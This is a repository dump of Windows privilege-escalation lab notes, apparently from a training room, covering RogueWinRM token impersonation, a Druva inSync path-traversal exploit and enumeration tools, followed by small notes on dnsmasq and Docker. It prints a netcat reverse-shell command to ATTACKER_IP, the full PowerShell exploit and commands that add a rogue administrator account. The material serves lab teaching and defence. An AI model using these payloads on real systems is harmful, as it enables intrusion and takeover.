## SeImpersonate / SeAssignPrimaryToken

These privileges allow a process to impersonate other users and act on their behalf.
Impersonation usually consists of being able to spawn a process or thread under the security context of another user.

Impersonation is easily understood when you think about how an FTP server works. The FTP server must restrict users to only access the files they should be allowed to see.

Let's assume we have an FTP service running as user `ftp`. Without impersonation, if user Ann logs into the FTP server and tries to access her files, the FTP service would try to access them with its own access token rather than Ann's:

![FTP server without impersonation](images/006115497113a0a4f03008028dc32fb7.png)

There are several reasons why using ftp's token is not the best idea:

- For the files to be served correctly, they would need to be accessible to the `ftp` user. In the example above, the FTP service would be able to access Ann's files, but not Bill's files, as the DACL on Bill's files doesn't allow user `ftp`. This adds complexity as we must manually configure specific permissions for each served file/directory.
- For the operating system, all files are accessed by user `ftp`, independent of which user is currently logged in to the FTP service. This makes it impossible to delegate the authorisation to the operating system; therefore, the FTP service must implement it.
- If the FTP service were compromised at some point, the attacker would immediately gain access to all of the folders to which the `ftp` user has access.

If, on the other hand, the FTP service's user has the SeImpersonate or SeAssignPrimaryToken privilege, all of this is simplified a bit, as the FTP service can temporarily grab the access token of the user logging in and use it to perform any task on their behalf:

![FTP server with impersonation](images/c25de66ae7777169d09a61ce2fb38e28.png)

Now, if user Ann logs in to the FTP service, given that the ftp user has impersonation privileges, it can borrow Ann's access token and use it to access her files. This way, the files don't need to provide access to user `ftp` in any way, and the operating system handles authorisation. Since the FTP service is impersonating Ann, it won't be able to access Jude's or Bill's files during that session.

As attackers, if we manage to take control of a process with SeImpersonate or SeAssignPrimaryToken privileges, we can impersonate any user connecting and authenticating to that process.

In Windows systems, you will find that the LOCAL SERVICE and NETWORK SERVICE accounts already have such privileges. Since these accounts are used to spawn services using restricted accounts, it makes sense to allow them to impersonate connecting users if the service needs to. Internet Information Services (IIS) will also create a similar default account called "iis apppool\defaultapppool" for web applications.

To elevate privileges using such accounts, an attacker needs the following:

1. To spawn a process so that users can connect and authenticate to it for impersonation to occur.
2. Find a way to force privileged users to connect and authenticate to the spawned malicious process.

We will use the RogueWinRM exploit to accomplish both conditions.

Let's start by assuming we have already compromised a website running on IIS and that we have planted a web shell at the following address:

`http://MACHINE_IP/`

We can use the web shell to check for the assigned privileges of the compromised account and confirm we hold both privileges of interest for this task:

![Webshell impersonate privileges](images/4603506a36f4bbda602dc67cdc845d9f.png)

To use RogueWinRM, we first need to upload the exploit to the target machine. For your convenience, this has already been done, and you can find the exploit in the `C:\tools\` folder.

The RogueWinRM exploit is possible because whenever a user (including unprivileged users) starts the BITS service in Windows, it automatically creates a connection to port 5985 using SYSTEM privileges. Port 5985 is typically used by the WinRM service, which exposes a PowerShell console to be used remotely through the network. Think of it like SSH, but using PowerShell.

If, for some reason, the WinRM service isn't running on the victim server, an attacker can start a fake WinRM service on port 5985 and catch the authentication attempt made by the BITS service when starting. If the attacker has SeImpersonate privileges, he can execute any command on behalf of the connecting user, which is SYSTEM.
733 | 734 | Before running the exploit, we'll start a netcat listener to receive a reverse shell on our attacker's machine: 735 | 736 | Kali Linux 737 | 738 | ``` 739 | user@attackerpc$ nc -lvp 4442 740 | ``` 741 | 742 | And then, use our web shell to trigger the RogueWinRM exploit using the following command: 743 | 744 | ``` 745 | c:\tools\RogueWinRM\RogueWinRM.exe -p "C:\tools\nc64.exe" -a "-e cmd.exe ATTACKER_IP 4442" 746 | ``` 747 | 748 | ![RogueWinRM exploit execution](images/24545e313a2e5ddee2386a68b4c7adeb.png) 749 | 750 | Note: The exploit may take up to 2 minutes to work, so your browser may appear as unresponsive for a bit. This happens if you run the exploit multiple times as it must wait for the BITS service to stop before starting it again. The BITS service will stop automatically after 2 minutes of starting. 751 | 752 | The `-p` parameter specifies the executable to be run by the exploit, which is `nc64.exe` in this case. The `-a` parameter is used to pass arguments to the executable. Since we want nc64 to establish a reverse shell against our attacker machine, the arguments to pass to netcat will be `-e cmd.exe ATTACKER_IP 4442`. 753 | 754 | If all was correctly set up, you should expect a shell with SYSTEM privileges: 755 | 756 | Kali Linux 757 | 758 | ``` 759 | user@attackerpc$ nc -lvp 4442 760 | Listening on 0.0.0.0 4442 761 | Connection received on 10.10.175.90 49755 762 | Microsoft Windows [Version 10.0.17763.1821] 763 | (c) 2018 Microsoft Corporation. All rights reserved. 764 | 765 | c:\windows\system32\inetsrv>whoami 766 | nt authority\system 767 | ``` 768 | 769 | Using any of the three methods discussed in this task, gain access to the Administrator's desktop and collect the flag. Don't forget to input the flag at the end of this task. 770 | 771 | # Abusing vulnerable software 772 | 773 | ## Unpatched Software 774 | 775 | Software installed on the target system can present various privilege escalation opportunities. 
As with drivers, organisations and users may not update them as often as they update the operating system. You can use the `wmic` tool to list software installed on the target system and its versions. The command below will dump the information it can gather on installed software (it might take around a minute to finish):
776 | 
777 | ```
778 | wmic product get name,version,vendor
779 | ```
780 | 
781 | Remember that the `wmic product` command may not return all installed programs: the `Win32_Product` class behind it only knows about software installed through Windows Installer (MSI), so anything installed by other means is missing. Querying that class also makes Windows Installer run a consistency check on every listed package, which is why the command is slow and why it leaves `MsiInstaller` reconfiguration events in the Application event log. On recent Windows builds `wmic` itself is deprecated and may not be present; the uninstall keys in the registry (`reg query HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall` and the `WOW6432Node` equivalent) are a quieter source that also covers non-MSI installers. It is always worth checking desktop shortcuts, available services or generally any trace that indicates the existence of additional software that might be vulnerable.
782 | 
783 | Once we have gathered product version information, we can search for existing exploits for the installed software online on sites like [exploit-db](https://www.exploit-db.com/), [packet storm](https://packetstormsecurity.com/) or plain old [Google](https://www.google.com/), amongst many others.
784 | 
785 | Using wmic and Google, can you find a known vulnerability on any installed product?
786 | 
787 | ## Case Study: Druva inSync 6.6.3
788 | 
789 | The target server is running Druva inSync 6.6.3, which is vulnerable to privilege escalation as reported by [Matteo Malvica](https://www.matteomalvica.com/blog/2020/05/21/lpe-path-traversal/). The vulnerability results from a bad patch applied over another vulnerability reported initially for version 6.5.0 by [Chris Lyne](https://www.tenable.com/security/research/tra-2020-12).
790 | 
791 | The software is vulnerable because it runs an RPC (Remote Procedure Call) server on port 6064 with SYSTEM privileges, accessible from localhost only. If you aren't familiar with RPC, it is simply a mechanism that allows a process to expose functions (called procedures in RPC lingo) over the network so that other processes or machines can call them remotely.
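An added example, not from the original notes, of what to do with the `wmic product` listing once it has been copied off the host: parse wmic's space-aligned table by the column offsets in its header and compare each version against a small watch list. The wmic output and the watch list are constructed for this example. The Druva inSync entry follows the case study on this page (6.6.3 is exploitable), but treating every release at or below 6.6.3 as affected is an assumption made for illustration, and "Example Backup Agent" is a fictitious product.

```python
"""Added example, not part of the original notes: parse the output of
``wmic product get name,version,vendor`` and flag installed versions that
are at or below a known-affected bound.

WMIC_OUTPUT and AFFECTED are constructed for this example. The Druva
inSync bound mirrors the case study on this page (6.6.3 is exploitable);
treating everything at or below 6.6.3 as affected is an assumption for
illustration, and "Example Backup Agent" is fictitious.
"""
import re

# wmic pads every column to its widest value and orders columns
# alphabetically (Name, Vendor, Version) whatever order was requested, so
# the parser takes column offsets from the header instead of assuming one.
WMIC_OUTPUT = """\
Name                                   Vendor                 Version
Druva inSync 6.6.3                     Druva Inc.             6.6.3
Microsoft Edge                         Microsoft Corporation  96.0.1054.62
Microsoft Visual C++ 2015 x64 Minimum  Microsoft Corporation  14.0.23026
Example Backup Agent                   Example Corp           2.4.1
"""

# Product name substring -> highest version treated as affected.
AFFECTED = {
    "Druva inSync": "6.6.3",          # assumed bound, see the case study
    "Example Backup Agent": "2.5.0",  # fictitious product, for illustration
}


def column_starts(header: str) -> list[int]:
    """Offsets at which each header word, and therefore each column, begins."""
    return [m.start() for m in re.finditer(r"(?<!\S)\S", header)]


def parse_wmic_table(text: str) -> list[dict[str, str]]:
    """Turn wmic's fixed-width listing into a list of {column: value} dicts."""
    lines = [ln.rstrip() for ln in text.splitlines() if ln.strip()]
    header, rows = lines[0], lines[1:]
    starts = column_starts(header)
    bounds = list(zip(starts, starts[1:] + [None]))  # last column runs to EOL
    names = [header[s:e].strip() for s, e in bounds]
    return [dict(zip(names, (row[s:e].strip() for s, e in bounds))) for row in rows]


def version_key(version: str) -> tuple[int, ...]:
    """Dotted version -> comparable integer tuple ('6.6.3' -> (6, 6, 3)).

    Non-numeric components count as 0, so '6.6.3b' sorts as (6, 6, 0);
    a shorter version such as '6.6' sorts before '6.6.3', as expected.
    """
    return tuple(int(part) if part.isdigit() else 0 for part in version.split("."))


def find_affected(records, watch_list=AFFECTED) -> list[tuple[str, str, str]]:
    """(name, installed version, affected bound) for every matching record."""
    hits = []
    for rec in records:
        for product, bound in watch_list.items():
            if product.lower() in rec["Name"].lower() and version_key(rec["Version"]) <= version_key(bound):
                hits.append((rec["Name"], rec["Version"], bound))
    return hits


if __name__ == "__main__":
    for name, version, bound in find_affected(parse_wmic_table(WMIC_OUTPUT)):
        print(f"{name} {version} is at or below affected version {bound}")
```

Feed it the saved `wmic` text (note that wmic writes UTF-16 when its output is redirected on Windows, so decode accordingly before parsing) and keep the watch list's bounds taken from the advisories you find, not from guesses.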
792 | 793 | In the case of Druva inSync, one of the procedures exposed (specifically procedure number 5) on port 6064 allowed anyone to request the execution of any command. Since the RPC server runs as SYSTEM, any command gets executed with SYSTEM privileges. 794 | 795 | The original vulnerability reported on versions 6.5.0 and prior allowed any command to be run without restrictions. The original idea behind providing such functionality was to remotely execute some specific binaries provided with inSync, rather than any command. Still, no check was made to make sure of that. 796 | 797 | A patch was issued, where they decided to check that the executed command started with the string `C:\ProgramData\Druva\inSync4\`, where the allowed binaries were supposed to be. But then, this proved insufficient since you could simply make a path traversal attack to bypass this kind of control. Suppose that you want to execute `C:\Windows\System32\cmd.exe`, which is not in the allowed path; you could simply ask the server to run `C:\ProgramData\Druva\inSync4\..\..\..\Windows\System32\cmd.exe` and that would bypass the check successfully. 798 | 799 | To put together a working exploit, we need to understand how to talk to port 6064. Luckily for us, the protocol in use is straightforward, and the packets to be sent are depicted in the following diagram: 800 | 801 | ![Druva Exploit Diagram](images/ff706d6530426d3123c0983acd61f934.png) 802 | 803 | The first packet is simply a hello packet that contains a fixed string. The second packet indicates that we want to execute procedure number 5, as this is the vulnerable procedure that will execute any command for us. The last two packets are used to send the length of the command and the command string to be executed, respectively. 
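The exchange just described, rebuilt in Python as an added example: it is not the published exploit and not part of the original notes. `build_request` emits the same four packets the PowerShell exploit sends, and a localhost stand-in for the RPC server parses them and applies either the patched-but-bypassable prefix check or a corrected one that normalises the path before comparing. The mock server, the ephemeral port it binds, the split of executable from arguments at the first space (the page does not show how the real service does this) and the `tool.exe` path are assumptions made for this example; nothing here contacts a real inSync install.

```python
"""Added example, not part of the original notes and not the published
exploit: the Druva inSync port-6064 exchange rebuilt in Python, with a
localhost stand-in for the service so the framing and the path check can
be exercised offline.

Assumptions made for this example: the mock server, the ephemeral port it
binds instead of 6064, splitting the executable from its arguments at the
first space, and the hypothetical C:\\ProgramData\\Druva\\inSync4\\tool.exe
path. Nothing here contacts a real inSync install.
"""
import ntpath
import socket
import struct
import threading

HELLO = b"inSync PHC RPCW[v0002]"   # fixed hello string, as in the exploit
PROC_EXEC = 5                       # procedure number that runs a command
ALLOWED_DIR = r"C:\ProgramData\Druva\inSync4"

# The traversal path used on this page, and a path that should stay allowed.
TRAVERSAL_CMD = r"C:\ProgramData\Druva\inSync4\..\..\..\Windows\System32\cmd.exe /c whoami"
LEGIT_CMD = r"C:\ProgramData\Druva\inSync4\tool.exe --status"   # hypothetical binary


def build_request(command: str, proc: int = PROC_EXEC) -> list[bytes]:
    """The four packets: hello, procedure number, command length, command.

    Integers are 4-byte little-endian and the command is UTF-16LE, which is
    what [System.BitConverter] and [Text.Encoding]::Unicode produce.
    """
    cmd = command.encode("utf-16-le")
    return [HELLO, struct.pack("<I", proc), struct.pack("<I", len(cmd)), cmd]


def vulnerable_check(exe: str) -> bool:
    """The 6.6.3 patch as described above: a plain string-prefix test."""
    return exe.startswith(ALLOWED_DIR + "\\")


def hardened_check(exe: str) -> bool:
    """Collapse '..' segments and case first, then test the prefix."""
    full = ntpath.normcase(ntpath.normpath(exe))
    return full.startswith(ntpath.normcase(ALLOWED_DIR) + "\\")


class MockInSyncServer:
    """Accepts one connection, parses the four packets, applies `check`."""

    def __init__(self, check):
        self.check = check
        self.result = None
        self.sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
        self.sock.bind(("127.0.0.1", 0))        # ephemeral port, not 6064
        self.sock.listen(1)
        self.port = self.sock.getsockname()[1]
        self.thread = threading.Thread(target=self._serve, daemon=True)
        self.thread.start()

    @staticmethod
    def _recv_exact(conn, n: int) -> bytes:
        buf = b""
        while len(buf) < n:
            chunk = conn.recv(n - len(buf))
            if not chunk:
                raise ConnectionError("peer closed before the frame was complete")
            buf += chunk
        return buf

    def _serve(self):
        conn, _ = self.sock.accept()
        with conn, self.sock:
            hello = self._recv_exact(conn, len(HELLO))
            proc = struct.unpack("<I", self._recv_exact(conn, 4))[0]
            length = struct.unpack("<I", self._recv_exact(conn, 4))[0]
            command = self._recv_exact(conn, length).decode("utf-16-le")
            exe = command.split(" ", 1)[0]      # assumption: args follow the first space
            self.result = {
                "hello_ok": hello == HELLO,
                "proc": proc,
                "exe": exe,
                "allowed": hello == HELLO and proc == PROC_EXEC and self.check(exe),
            }


def exercise(check, command: str) -> dict:
    """Run one client/server exchange against a server that applies `check`."""
    server = MockInSyncServer(check)
    with socket.create_connection(("127.0.0.1", server.port)) as client:
        for packet in build_request(command):
            client.sendall(packet)
    server.thread.join(timeout=5)
    return server.result


if __name__ == "__main__":
    for label, check in (("vulnerable", vulnerable_check), ("hardened", hardened_check)):
        print(label, "traversal allowed:", exercise(check, TRAVERSAL_CMD)["allowed"])
        print(label, "legit allowed:    ", exercise(check, LEGIT_CMD)["allowed"])
```

The prefix check passes the traversal string because `C:\ProgramData\Druva\inSync4\..\..\..\Windows\System32\cmd.exe` really does begin with the allowed directory; only after `..` is resolved does the path show itself to be `C:\Windows\System32\cmd.exe`, which the normalised comparison rejects while still accepting a genuine path under `inSync4`.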
804 | 805 | Initially published by Matteo Malvica [here](https://packetstormsecurity.com/files/160404/Druva-inSync-Windows-Client-6.6.3-Privilege-Escalation.html), the following exploit can be used in your target machine to elevate privileges and retrieve this task's flag. For your convenience, here is the original exploit's code: 806 | 807 | ``` 808 | $ErrorActionPreference = "Stop" 809 | 810 | $cmd = "net user pwnd /add" 811 | 812 | $s = New-Object System.Net.Sockets.Socket( 813 | [System.Net.Sockets.AddressFamily]::InterNetwork, 814 | [System.Net.Sockets.SocketType]::Stream, 815 | [System.Net.Sockets.ProtocolType]::Tcp 816 | ) 817 | $s.Connect("127.0.0.1", 6064) 818 | 819 | $header = [System.Text.Encoding]::UTF8.GetBytes("inSync PHC RPCW[v0002]") 820 | $rpcType = [System.Text.Encoding]::UTF8.GetBytes("$([char]0x0005)`0`0`0") 821 | $command = [System.Text.Encoding]::Unicode.GetBytes("C:\ProgramData\Druva\inSync4\..\..\..\Windows\System32\cmd.exe /c $cmd"); 822 | $length = [System.BitConverter]::GetBytes($command.Length); 823 | 824 | $s.Send($header) 825 | $s.Send($rpcType) 826 | $s.Send($length) 827 | $s.Send($command) 828 | ``` 829 | 830 | You can pop a Powershell console and paste the exploit directly to execute it (The exploit is also available in the target machine at `C:\tools\Druva_inSync_exploit.txt`). Note that the exploit's default payload, specified in the `$cmd` variable, will create a user named `pwnd` in the system, but won't assign him administrative privileges, so we will probably want to change the payload for something more useful. For this room, we will change the payload to run the following command: 831 | 832 | ``` 833 | net user pwnd SimplePass123 /add & net localgroup administrators pwnd /add 834 | ``` 835 | 836 | This will create user `pwnd` with a password of `SimplePass123` and add it to the administrators' group. 
If the exploit was successful, you should be able to run the following command to verify that the user `pwnd` exists and is part of the administrators' group: 837 | 838 | ``` 839 | PS C:\> net user pwnd 840 | User name pwnd 841 | Full Name 842 | Account active Yes 843 | [...] 844 | 845 | Local Group Memberships *Administrators *Users 846 | Global Group memberships *None 847 | ``` 848 | 849 | As a last step, you can run a command prompt as administrator: 850 | 851 | ![Run Command Prompt as Pwnd](images/bbd0af143c9a9b31c1acce32fabfdc0f.png) 852 | 853 | When prompted for credentials, use the `pwnd` account. From the new command prompt, you can retrieve your flag from the Administrator's desktop with the following command `type C:\Users\Administrator\Desktop\flag.txt`. 854 | 855 | # Tools of the Trade 856 | Several scripts exist to conduct system enumeration in ways similar to the ones seen in the previous task. These tools can shorten the enumeration process time and uncover different potential privilege escalation vectors. However, please remember that automated tools can sometimes miss privilege escalation. 857 | 858 | Below are a few tools commonly used to identify privilege escalation vectors. Feel free to run them against any of the machines in this room and see if the results match the discussed attack vectors. 859 | 860 | ## WinPEAS 861 | 862 | WinPEAS is a script developed to enumerate the target system to uncover privilege escalation paths. You can find more information about winPEAS and download either the precompiled executable or a .bat script. WinPEAS will run commands similar to the ones listed in the previous task and print their output. The output from winPEAS can be lengthy and sometimes difficult to read. 
This is why it is good practice to always redirect the output to a file, as shown below:
863 | 
864 | Command Prompt
865 | 
866 | ```
867 | C:\> winpeas.exe > outputfile.txt
868 | ```
869 | 
870 | WinPEAS can be downloaded [here](https://github.com/carlospolop/PEASS-ng/tree/master/winPEAS).
871 | 
872 | ## PrivescCheck
873 | 
874 | PrivescCheck is a PowerShell script that searches for common privilege escalation vectors on the target system. It provides an alternative to WinPEAS without requiring the execution of a binary file.
875 | 
876 | PrivescCheck can be downloaded [here](https://github.com/itm4n/PrivescCheck).
877 | 
878 | Reminder: To run PrivescCheck on the target system, you may need to bypass the execution policy restrictions. To achieve this, you can use the `Set-ExecutionPolicy` cmdlet as shown below (`-Scope Process` only affects the current PowerShell session, so nothing persists on the host).
879 | 
880 | PowerShell
881 | 
882 | ```
883 | PS C:\> Set-ExecutionPolicy Bypass -Scope Process -Force
884 | PS C:\> . .\PrivescCheck.ps1
885 | PS C:\> Invoke-PrivescCheck
886 | ```
887 | 
888 | ## WES-NG: Windows Exploit Suggester - Next Generation
889 | 
890 | Some exploit suggesting scripts (e.g. winPEAS) require you to upload them to the target system and run them there. This may cause antivirus software to detect and delete them. To avoid making unnecessary noise that can attract attention, you may prefer to use WES-NG, which runs on your attacking machine.
891 | 
892 | WES-NG is a Python script that can be found and downloaded [here](https://github.com/bitsadmin/wesng).
893 | 
894 | Once installed, and before using it, run `wes.py --update` to update the database. The script refers to the database it creates to check for missing patches that can result in a vulnerability you can use to elevate your privileges on the target system.
895 | 
896 | To use the script, you need to run the `systeminfo` command on the target system. Do not forget to redirect the output to a .txt file, which you then need to move to your attacking machine.
897 | 
898 | Once this is done, wes.py can be run as follows:
899 | 
900 | Kali Linux
901 | 
902 | ```
903 | user@kali$ wes.py systeminfo.txt
904 | ```
905 | 
906 | ## Metasploit
907 | 
908 | If you already have a Meterpreter shell on the target system, you can use the `post/multi/recon/local_exploit_suggester` module to list vulnerabilities that may affect the target system and allow you to elevate your privileges on it.
--------------------------------------------------------------------------------
/alpine-mirrors.md:
--------------------------------------------------------------------------------
1 | Create the directory and mirrors file with the following - http://dl-cdn.alpinelinux.org/alpine/MIRRORS.txt
2 | 
3 | You may need to run ./build-alpine a couple of times until it selects a working mirror.
4 | 
5 | This was the winner for me - http://mirror.ps.kz/alpine//v3.13/main
6 | 
7 | ALPINE MIRRORS
8 | http://dl-cdn.alpinelinux.org/alpine/
9 | http://uk.alpinelinux.org/alpine/
10 | http://dl-2.alpinelinux.org/alpine/
11 | http://dl-4.alpinelinux.org/alpine/
12 | http://dl-5.alpinelinux.org/alpine/
13 | http://mirror.yandex.ru/mirrors/alpine/
14 | http://mirrors.gigenet.com/alpinelinux/
15 | http://mirror1.hs-esslingen.de/pub/Mirrors/alpine/
16 | http://mirror.leaseweb.com/alpine/
17 | http://mirror.fit.cvut.cz/alpine/
18 | http://alpine.mirror.far.fi/
19 | http://alpine.mirror.wearetriple.com/
20 | http://mirror.clarkson.edu/alpine/
21 | http://linorg.usp.br/AlpineLinux/
22 | http://ftp.yzu.edu.tw/Linux/alpine/
23 | http://mirror.aarnet.edu.au/pub/alpine
24 | http://speglar.siminn.is/alpine/
25 | http://mirrors.dotsrc.org/alpine/
26 | http://ftp.halifax.rwth-aachen.de/alpine/
27 | http://mirrors.tuna.tsinghua.edu.cn/alpine/
28 | http://mirrors.ustc.edu.cn/alpine/
29 | http://mirrors.xjtu.edu.cn/alpine/
30 | http://mirrors.nju.edu.cn/alpine/
31 | http://mirror.lzu.edu.cn/alpine/
32 | http://ftp.acc.umu.se/mirror/alpinelinux.org/
33 | 
http://mirror.xtom.com.hk/alpine/
34 | http://mirror.csclub.uwaterloo.ca/alpine/
35 | http://alpinelinux.mirror.iweb.com/
36 | http://pkg.adfinis.com/alpine/
37 | http://mirror.ps.kz/alpine/
38 | http://mirror.rise.ph/alpine-linux/
39 | http://mirror.operationtulip.com/alpine/
40 | http://mirrors.ircam.fr/pub/alpine/
41 | http://alpine.42.fr/
42 | http://mirror.math.princeton.edu/pub/alpinelinux/
43 | http://mirrors.sjtug.sjtu.edu.cn/alpine/
44 | http://ftp.icm.edu.pl/pub/Linux/distributions/alpine/
45 | http://mirror.ungleich.ch/mirror/packages/alpine/
46 | http://alpine.mirror.vexxhost.ca/
47 | http://sjc.edge.kernel.org/alpine/
48 | http://ewr.edge.kernel.org/alpine/
49 | http://ams.edge.kernel.org/alpine/
50 | http://download.nus.edu.sg/mirror/alpine/
51 | http://alpine.yourlabs.org
52 | http://mirror.pit.teraswitch.com/alpine
53 | http://mirror.reenigne.net/alpine/
54 | http://quantum-mirror.hu/mirrors/pub/alpine/
55 | http://tux.rainside.sk/alpine/
56 | http://alpine.cs.nctu.edu.tw/
57 | http://mirror.ihost.md/alpine/
58 | http://mirror.ette.biz/alpine/
59 | http://mirror.lagoon.nc/alpine/
60 | http://alpinelinux.c3sl.ufpr.br
61 | http://foobar.turbo.net.id/alpine/
62 | http://alpine.ccns.ncku.edu.tw
--------------------------------------------------------------------------------
/dnsmasq.md:
--------------------------------------------------------------------------------
1 | # DNSMASQ
2 | 
3 | ## Install
4 | 
5 | With recent versions of Kali, dnsmasq is run by NetworkManager itself (through the `dnsmasq-base` package), so the standalone dnsmasq service is not needed.
6 | 
7 | If you installed dnsmasq previously, remove it:
8 | 
9 | ```bash
10 | sudo apt remove dnsmasq
11 | ```
12 | 
13 | - Add `dns=dnsmasq` to /etc/NetworkManager/NetworkManager.conf
14 | ```bash
15 | sudo vi /etc/NetworkManager/NetworkManager.conf
16 | [main]
17 | dns=dnsmasq
18 | plugins=ifupdown,keyfile
19 | 
20 | [ifupdown]
21 | managed=false
22 | ```
23 | 
24 | - Create a personal conf file (`server=` is the upstream resolver, `address=` pins a domain to the lab IP)
25 | ```bash
26 | sudo vi /etc/NetworkManager/dnsmasq.d/olivierprotips.conf
27 | server=8.8.8.8
28 | 
29 | address=/.quotient.thm/10.10.250.116
30 | ```
31 | 
32 | - Restart the NetworkManager service
33 | 
34 | ```bash
35 | sudo systemctl restart NetworkManager.service
36 | ```
37 | 
38 | ## Script to add entry (thanks Bigyls)
39 | 
40 | > full script is [here](https://github.com/OlivierProTips/kali-resources/blob/master/dnsmasq-update)
41 | 
42 | ```bash
43 | #!/bin/bash
44 | 
45 | # Usage: ./dnsmasq-update.sh <domain> <ip>
46 | 
47 | if [ "$EUID" -ne 0 ]
48 | then
49 | echo "ERROR: Please run as root"
50 | exit 1
51 | fi
52 | 
53 | domain=$1
54 | host=$2
55 | config_path="/etc/NetworkManager/dnsmasq.d/"
56 | dom_array=(`echo $domain | tr '.' '\n'`)
57 | tld=${dom_array[${#dom_array[@]}-1]}
58 | config_file=${config_path}${tld}".conf"
59 | 
60 | if [ $# -eq 2 ]; then
61 | 
62 | if [ ! -e "$config_file" ]; then
63 | echo "server=8.8.8.8" > "$config_file"
64 | fi
65 | 
66 | echo "address=/.${domain}/${host}" >> "$config_file"
67 | systemctl restart NetworkManager.service;
68 | else
69 | echo "ERR: Incorrect arguments.";
70 | exit 1;
71 | fi
72 | ```
73 | 
74 | ## Demo
75 | 
76 | ![Alt text](images/dnsmasq.gif)
77 | 
78 | ## Troubleshooting
79 | 
80 | Sometimes it does not work: when you ping the hostname, you get no response.
81 | 
82 | This may be caused by `systemd-resolved`.
83 | 
84 | In recent Kali releases this service no longer exists, but on older ones it rewrites your `/etc/resolv.conf` to point at its own stub resolver, so queries never reach the dnsmasq instance run by NetworkManager.
85 | 
86 | - Disable systemd-resolved
87 | 
88 | ```bash
89 | sudo systemctl disable systemd-resolved.service
90 | sudo systemctl stop systemd-resolved.service
91 | ```
92 | 
93 | - Modify /etc/resolv.conf so that the local dnsmasq is the nameserver
94 | 
95 | ```bash
96 | nameserver 127.0.0.1
97 | options edns0 trust-ad
98 | ```
--------------------------------------------------------------------------------
/docker.md:
--------------------------------------------------------------------------------
1 | # DOCKER
2 | 
3 | ## Delete unused data (stopped containers, dangling images, unused networks, build cache)
4 | 
5 | ```bash
6 | docker system prune
7 | ```
8 | 
9 | ## Delete all unused images as well, not only dangling ones
10 | 
11 | ```bash
12 | docker system prune -a
13 | ```
14 | 
15 | ## Images folder
16 | 
17 | ```bash
18 | /var/lib/docker/overlay2
19 | ```
20 | 
21 | ## Launch
22 | 
23 | ### Install and launch image
24 | 
25 | ```bash
26 | sudo docker run -it --rm -p 12345:80 -d wordpress
27 | ```
28 | 
29 | * -d: detach (background)
30 | * --rm: delete container when stopped
31 | * -it: interactive mode (keep stdin open and allocate a TTY)
32 | 
33 | ### List all containers
34 | 
35 | ```bash
36 | sudo docker ps -a
37 | ```
38 | 
39 | ### Start / Stop / rm
40 | 
41 | ```bash
42 | sudo docker start [id]
43 | sudo docker stop [id]
44 | sudo docker rm [id]
45 | ```
46 | 
47 | ## Docker compose
48 | 
49 | ### Update
50 | ```bash
51 | docker-compose pull
52 | docker-compose up -d --remove-orphans
53 | docker image prune
54 | ```
55 | 
56 | ## Synology
57 | 
58 | ### Update
59 | 
60 | 1. Go to Registry and download the new image (mostly the “latest” version)
61 | 2. Go to Container, select the container you need to update and stop it
62 | 3. From the Actions menu select “Clear/Reset”
63 | 4. 
Start the container again -------------------------------------------------------------------------------- /images/006115497113a0a4f03008028dc32fb7.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/OlivierProTips/HackNotes/a8946336f4db06a56458f05f94a2cafd5891c5eb/images/006115497113a0a4f03008028dc32fb7.png -------------------------------------------------------------------------------- /images/06c05c134e4922ec8ff8d9b56382c58f.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/OlivierProTips/HackNotes/a8946336f4db06a56458f05f94a2cafd5891c5eb/images/06c05c134e4922ec8ff8d9b56382c58f.png -------------------------------------------------------------------------------- /images/1401bc3dcb1e4eb84f526b95567a5ef8.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/OlivierProTips/HackNotes/a8946336f4db06a56458f05f94a2cafd5891c5eb/images/1401bc3dcb1e4eb84f526b95567a5ef8.png -------------------------------------------------------------------------------- /images/24545e313a2e5ddee2386a68b4c7adeb.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/OlivierProTips/HackNotes/a8946336f4db06a56458f05f94a2cafd5891c5eb/images/24545e313a2e5ddee2386a68b4c7adeb.png -------------------------------------------------------------------------------- /images/33303d0cde736589d2838ee894379ff2.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/OlivierProTips/HackNotes/a8946336f4db06a56458f05f94a2cafd5891c5eb/images/33303d0cde736589d2838ee894379ff2.png -------------------------------------------------------------------------------- /images/4603506a36f4bbda602dc67cdc845d9f.png: -------------------------------------------------------------------------------- 
https://raw.githubusercontent.com/OlivierProTips/HackNotes/a8946336f4db06a56458f05f94a2cafd5891c5eb/images/4603506a36f4bbda602dc67cdc845d9f.png -------------------------------------------------------------------------------- /images/a5437a609e41d982b320967667e9b97a.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/OlivierProTips/HackNotes/a8946336f4db06a56458f05f94a2cafd5891c5eb/images/a5437a609e41d982b320967667e9b97a.png -------------------------------------------------------------------------------- /images/bbd0af143c9a9b31c1acce32fabfdc0f.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/OlivierProTips/HackNotes/a8946336f4db06a56458f05f94a2cafd5891c5eb/images/bbd0af143c9a9b31c1acce32fabfdc0f.png -------------------------------------------------------------------------------- /images/befb434f15dbd4deee0654f8b6ef6de0.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/OlivierProTips/HackNotes/a8946336f4db06a56458f05f94a2cafd5891c5eb/images/befb434f15dbd4deee0654f8b6ef6de0.png -------------------------------------------------------------------------------- /images/c25de66ae7777169d09a61ce2fb38e28.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/OlivierProTips/HackNotes/a8946336f4db06a56458f05f94a2cafd5891c5eb/images/c25de66ae7777169d09a61ce2fb38e28.png -------------------------------------------------------------------------------- /images/d8244cfd9d64a7be30f5fb0308fd0806.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/OlivierProTips/HackNotes/a8946336f4db06a56458f05f94a2cafd5891c5eb/images/d8244cfd9d64a7be30f5fb0308fd0806.png -------------------------------------------------------------------------------- 
